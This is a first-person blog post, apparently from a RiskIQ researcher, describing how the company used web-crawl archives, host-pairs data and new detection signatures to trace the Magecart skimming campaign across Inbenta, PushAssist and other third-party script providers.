The Magecart project is the biggest thing I’ve worked on in my career in both the scope of the cyber threat, the effects of the breaches, and, as a result, the media attention our work garnered. It wasn’t possible without RiskIQ data.
Seeing words I wrote quoted on national news is a new experience for me personally, but the work we put into the project was not—far from it. The data we used, as well as the techniques we employed to work with and surface it, were typical of the analytics and cyber threat detection we carry out at RiskIQ every day. In the case of Magecart, our data sets allowed us to discover the breadth and scope of a massive compromise across the internet that few else could.
We first learned of the Inbenta breach through the disclosures Ticketmaster, Monzo Bank, and Inbenta released in late June and decided to dig into our data to see what we could find about it. We quickly identified several crawls of Inbenta scripts we had stored in RiskIQ's database. Finding them was relatively easy because Inbenta used subdomains with the name of the website using the script along with the geographic region in the hostname, i.e., ticketmasteruk.inbenta[.]com. Ticketmaster websites were utilizing these scripts for the geographic areas described in the disclosure of the breach
A key feature of RiskIQ’s integrated digital threat platform is our worldwide network of web crawlers. We continuously crawl the internet, collecting not just rendered pages but also the entire sequence of requests and responses that make up a web page—headers, dependent requests, certificates, and more. These crawls give us great insight into what is happening on a web server at any given point in time, and how that server would interact with a real user. We also incorporate the wealth of data we obtain from crawls into our aggregated datasets and our host pairs dataset, which proved especially useful for the analysis of Magecart. (A full description of host pairs is below.)
Back in 2015, RiskIQ researchers performed the initial research on Magecart, investigating their methods and infrastructure as well as developing detection signatures. We published a description of the cyber threat along with ClearSkySec in 2016. However, as happens with all threats, Magecart evolved, and the version of the data-stealing script we saw in the Inbenta breach was one we had not seen before.
After this discovery, the first order of business was to create new signature-based detections for the updated versions of Magecart. RiskIQ’s internal detection engine analyzes many features of a page, from the raw code and metadata to web components present (e.g., servers, CMS’s) to behavioral analysis of the page. From the examples found in our crawl data, we were able to create a varied list of detection signatures for Magecart.
The next goal was to find the scale and scope of this campaign. A critical tool in this effort was RiskIQ’s host pairs dataset. Host pairs leverages our crawl data to extract essential relationships between hosts. For example, if a page at “http://www.example.com/ooga.html” loads a script hosted at “http://cdn.somejs.com/foo.js”, that will generate a host pair between the parent host, “www.example.com” and the child host, “cdn.somejs.com”. We currently have more than 800 million host pairs and add more every day, enriching the picture of the global internet with these additional connections.
By leveraging this data and finding all host pairs of Inbenta subdomains, we obtained an extensive list of historic crawls that contained likely infected hosts. We then went back in time and reprocessed these historic crawls with our new detection signatures, looking for occurrences of Magecart.
During the re-processing something happened we did not expect—we started getting hits immediately on new hosts other than Inbenta. Another third-party provider, cdn.pushassist[.]com, also showed evidence of the Magecart injection. By again referring to our Host Pairs dataset, we pulled over 1,700 new hosts to analyze. Each time we ran across a new third-party provider (SociaPlus, Annex Cloud, etc.), we pulled all the crawls we had for that provider and their host pairs and queued them for re-processing. All told, we ended up re-checking six million crawls from 2016 through the present day.
Our ability to go back in time allowed us to establish a clear timeline for the various breaches we detected and to pinpoint all the e-commerce sites that were affected by them over the course of that period. With this data, we can provide invaluable assistance to sites affected by Magecart in understanding when and how broadly the compromises reached, helping to complete the picture of the breach and allowing for the crafting of a fuller narrative for disclosure and reporting to leadership.
We’re currently continuing to use our data to research the Magecart cyber threat, examining other CDNs and third-party providers for signs of Magecart versions, developing further detection content and techniques for monitoring and surfacing anomalous elements in js and/or changes therein, and checking through past reported compromises that share elements with those we found during our previous investigations.